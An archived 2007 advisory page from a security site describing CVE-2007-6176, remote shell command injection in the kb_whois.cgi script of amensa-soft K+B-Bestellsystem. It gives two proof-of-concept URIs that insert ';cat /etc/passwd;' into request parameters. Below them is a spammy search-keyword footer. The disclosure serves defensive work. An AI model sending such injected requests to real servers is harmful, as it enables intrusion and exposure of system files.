about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , amensa-soft K+B-Bestellsystem KB_Whois.CGI Multiple Remote Shell Command Execution Vulnerabilities


Title amensa-soft K+B-Bestellsystem KB_Whois.CGI Multiple Remote Shell Command Execution Vulnerabilities
Published 2007-11-22-12:00AM
Updated 2007-12-18-08:06PM
Class Input Validation Error
CVE   CVE-2007-6176
Remote  Yes
Local  No
Credit  Zero X is credited with discovering this issue.
Vulnerable  amensasoft KBBestellsystem 2.3.3
Not Vulnerable  
Code  An attacker can use a browser to exploit this issue. The following proof-of-concept URIs are available: http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=;cat%20/etc/passwd;&tld=.com&tarrif=
http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=google&tld=.com;cat /etc/passwd;&tarrif=
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Tue, 02 Dec 2008 10:26:13 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
henai mascos x 1 arcserv an www.tamils Www.Video dogsexcom www.tamils www.gaoqin php-nuke 2 www.sextoy news for C sexyphoto. Www.3733.c php-nuke 2 www.google trisha sex php-nuke 2 trisha sex trisha sex opensex Nazleenjal sexy grils phpBB por news for c www.teenbo msn exploi www.sex oc sexy grils PHP Advanc www.4sexy. mambo Remo phpBB++por sexygirles Tamil actr www.preast splinter c www.funmaz t37t www.tuokee phpBB por apache coy arap sex t421t Pinkyworld www.funmaz t37t php-nuke 2 wald sex arap sex php-nuke 2